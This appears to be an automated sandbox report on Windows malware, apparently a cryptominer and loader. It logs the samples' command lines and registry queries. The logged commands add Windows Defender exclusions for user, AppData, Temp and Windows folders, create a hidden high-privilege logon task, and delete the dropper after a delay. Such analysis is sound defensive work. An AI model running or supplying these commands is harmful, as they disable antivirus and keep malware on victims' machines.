Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -command add-mppreference -exclusionpath '%userprofile%' & powershell -command add-mppreference -exclusionpath '%appdata%' & powershell -command add-mppreference -exclusionpath '%temp%' & powershell -command add-mppreference -exclusionpath '%systemroot%' & exit

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401550 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

7_2_00401550

Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C3D312 cpuid

6_2_00C3D312

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
